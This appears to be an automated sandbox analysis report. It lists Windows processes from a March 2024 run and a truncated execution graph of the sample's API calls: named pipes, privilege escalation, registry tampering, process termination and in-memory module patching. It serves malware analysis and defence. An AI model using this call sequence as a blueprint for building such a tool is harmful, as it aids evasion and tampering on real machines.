                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:108
                                                                                                                                                                                                    Start time:14:00:06
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:109
                                                                                                                                                                                                    Start time:14:00:06
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:110
                                                                                                                                                                                                    Start time:14:00:07
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:111
                                                                                                                                                                                                    Start time:14:00:07
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:112
                                                                                                                                                                                                    Start time:14:00:08
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:113
                                                                                                                                                                                                    Start time:14:00:13
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:114
                                                                                                                                                                                                    Start time:14:00:14
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:115
                                                                                                                                                                                                    Start time:14:00:14
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:116
                                                                                                                                                                                                    Start time:14:00:15
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                                                                                    Imagebase:0x7ff7402f0000
                                                                                                                                                                                                    File size:12'859'472 bytes
                                                                                                                                                                                                    MD5 hash:75F42872C0302D36A1E3BB5C7928FC02
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:117
                                                                                                                                                                                                    Start time:14:00:25
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:118
                                                                                                                                                                                                    Start time:14:00:26
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k NetSvcs -p -s iphlpsvc
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:119
                                                                                                                                                                                                    Start time:14:00:27
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:120
                                                                                                                                                                                                    Start time:14:00:27
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:121
                                                                                                                                                                                                    Start time:14:00:28
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s NcdAutoSetup
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:122
                                                                                                                                                                                                    Start time:14:00:28
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\sihost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:sihost.exe
                                                                                                                                                                                                    Imagebase:0x7ff7cace0000
                                                                                                                                                                                                    File size:111'616 bytes
                                                                                                                                                                                                    MD5 hash:A21E7719D73D0322E2E7D61802CB8F80
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:123
                                                                                                                                                                                                    Start time:14:00:30
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:124
                                                                                                                                                                                                    Start time:14:00:31
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:125
                                                                                                                                                                                                    Start time:14:00:33
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:126
                                                                                                                                                                                                    Start time:14:00:33
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                                                                                    Imagebase:0x7ff63b2c0000
                                                                                                                                                                                                    File size:468'120 bytes
                                                                                                                                                                                                    MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:127
                                                                                                                                                                                                    Start time:14:00:33
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:128
                                                                                                                                                                                                    Start time:14:00:34
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:129
                                                                                                                                                                                                    Start time:14:00:34
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TabletInputService
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:130
                                                                                                                                                                                                    Start time:14:00:35
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\ctfmon.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:ctfmon.exe
                                                                                                                                                                                                    Imagebase:0x7ff63dcc0000
                                                                                                                                                                                                    File size:11'264 bytes
                                                                                                                                                                                                    MD5 hash:B625C18E177D5BEB5A6F6432CCF46FB3
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:131
                                                                                                                                                                                                    Start time:14:00:36
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\dasHost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:dashost.exe {56d287c9-3fb8-41cd-a9e100d94de470c6}
                                                                                                                                                                                                    Imagebase:0x7ff6003f0000
                                                                                                                                                                                                    File size:98'816 bytes
                                                                                                                                                                                                    MD5 hash:2857A196985FC58A74C337B5E95B2174
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:132
                                                                                                                                                                                                    Start time:14:00:37
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:133
                                                                                                                                                                                                    Start time:14:00:38
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:134
                                                                                                                                                                                                    Start time:14:00:39
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                    Imagebase:0x7ff71ebd0000
                                                                                                                                                                                                    File size:5'141'208 bytes
                                                                                                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:135
                                                                                                                                                                                                    Start time:14:00:53
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:136
                                                                                                                                                                                                    Start time:14:00:54
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                    Imagebase:0x7ff66aaa0000
                                                                                                                                                                                                    File size:103'288 bytes
                                                                                                                                                                                                    MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:137
                                                                                                                                                                                                    Start time:14:00:56
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                    Imagebase:0x7ff66aaa0000
                                                                                                                                                                                                    File size:103'288 bytes
                                                                                                                                                                                                    MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:138
                                                                                                                                                                                                    Start time:14:01:17
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                    Imagebase:0x7ff66aaa0000
                                                                                                                                                                                                    File size:103'288 bytes
                                                                                                                                                                                                    MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:139
                                                                                                                                                                                                    Start time:14:01:25
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\dllhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                                    Imagebase:0x7ff6e9610000
                                                                                                                                                                                                    File size:21'312 bytes
                                                                                                                                                                                                    MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Disassembly

                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                      Execution Coverage:46.1%
                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                      Signature Coverage:67%
                                                                                                                                                                                                      Total number of Nodes:227
                                                                                                                                                                                                      Total number of Limit Nodes:24
                                                                                                                                                                                                      execution_graph 522 140002524 523 140002531 522->523 524 140002539 522->524 525 1400010c0 30 API calls 523->525 525->524 383 140002bf8 384 140002c05 383->384 386 140002c25 ConnectNamedPipe 384->386 387 140002c1a Sleep 384->387 393 140001b54 AllocateAndInitializeSid 384->393 388 140002c83 Sleep 386->388 389 140002c34 ReadFile 386->389 387->384 391 140002c8e DisconnectNamedPipe 388->391 390 140002c57 WriteFile 389->390 389->391 390->391 391->386 394 140001bb1 SetEntriesInAclW 393->394 395 140001c6f 393->395 394->395 396 140001bf5 LocalAlloc 394->396 395->384 396->395 397 140001c09 InitializeSecurityDescriptor 396->397 397->395 398 140001c19 SetSecurityDescriptorDacl 397->398 398->395 399 140001c30 CreateNamedPipeW 398->399 399->395 400 140002258 403 14000226c 400->403 427 140001f2c 403->427 406 140001f2c 14 API calls 407 14000228f GetCurrentProcessId OpenProcess 406->407 408 140002321 FindResourceA 407->408 409 1400022af OpenProcessToken 407->409 412 140002341 SizeofResource 408->412 413 140002261 ExitProcess 408->413 410 1400022c3 LookupPrivilegeValueW 409->410 411 140002318 FindCloseChangeNotification 409->411 410->411 414 1400022da AdjustTokenPrivileges 410->414 411->408 412->413 415 14000235a LoadResource 412->415 414->411 416 140002312 GetLastError 414->416 415->413 417 14000236e LockResource GetCurrentProcessId 415->417 416->411 441 1400017ec GetProcessHeap RtlAllocateHeap 417->441 419 14000238b RegCreateKeyExW 420 140002489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 419->420 421 1400023cc ConvertStringSecurityDescriptorToSecurityDescriptorW 419->421 422 14000250f SleepEx 420->422 423 1400023f4 RegSetKeySecurity LocalFree 421->423 424 14000240e RegCreateKeyExW 421->424 422->422 423->424 425 140002448 GetCurrentProcessId RegSetValueExW RegCloseKey 424->425 426 14000247f RegCloseKey 424->426 425->426 426->420 428 140001f35 StrCpyW StrCatW GetModuleHandleW 427->428 429 1400020ff 427->429 428->429 430 140001f86 GetCurrentProcess K32GetModuleInformation 428->430 429->406 431 1400020f6 FreeLibrary 430->431 432 140001fb6 CreateFileW 430->432 431->429 432->431 433 140001feb CreateFileMappingW 432->433 434 140002014 MapViewOfFile 433->434 435 1400020ed CloseHandle 433->435 436 1400020e4 FindCloseChangeNotification 434->436 437 140002037 434->437 435->431 436->435 437->436 438 140002050 lstrcmpi 437->438 440 14000208e 437->440 438->437 439 140002090 VirtualProtect VirtualProtect 438->439 439->436 440->436 447 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 441->447 443 140001885 GetProcessHeap HeapFree 444 140001830 444->443 445 140001851 OpenProcess 444->445 445->444 446 140001867 TerminateProcess CloseHandle 445->446 446->444 448 140001565 447->448 449 14000162f GetProcessHeap RtlDeleteBoundaryDescriptor GetProcessHeap RtlRestoreThreadPreferredUILanguages 447->449 448->449 450 14000157a OpenProcess 448->450 452 14000161a FindCloseChangeNotification 448->452 453 1400015c9 ReadProcessMemory 448->453 449->444 450->448 451 140001597 K32EnumProcessModules 450->451 451->448 451->452 452->448 453->448 454 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 455 140002b8e K32EnumProcesses 454->455 456 140002beb Sleep 455->456 458 140002ba3 455->458 456->455 457 140002bdc 457->456 458->457 460 140002540 458->460 461 140002558 460->461 462 14000254d 460->462 461->458 464 1400010c0 462->464 502 1400018ac OpenProcess 464->502 467 1400014ba 467->461 468 140001122 OpenProcess 468->467 469 14000113e OpenProcess 468->469 470 140001161 K32GetModuleFileNameExW 469->470 471 1400011fd NtQueryInformationProcess 469->471 472 1400011aa CloseHandle 470->472 473 14000117a PathFindFileNameW lstrlenW 470->473 474 1400014b1 CloseHandle 471->474 475 140001224 471->475 472->471 477 1400011b8 472->477 473->472 476 140001197 StrCpyW 473->476 474->467 475->474 478 140001230 OpenProcessToken 475->478 476->472 477->471 479 1400011d8 StrCmpIW 477->479 478->474 480 14000124e GetTokenInformation 478->480 479->474 479->477 481 1400012f1 480->481 482 140001276 GetLastError 480->482 483 1400012f8 CloseHandle 481->483 482->481 484 140001281 LocalAlloc 482->484 483->474 489 14000130c 483->489 484->481 485 140001297 GetTokenInformation 484->485 486 1400012df 485->486 487 1400012bf 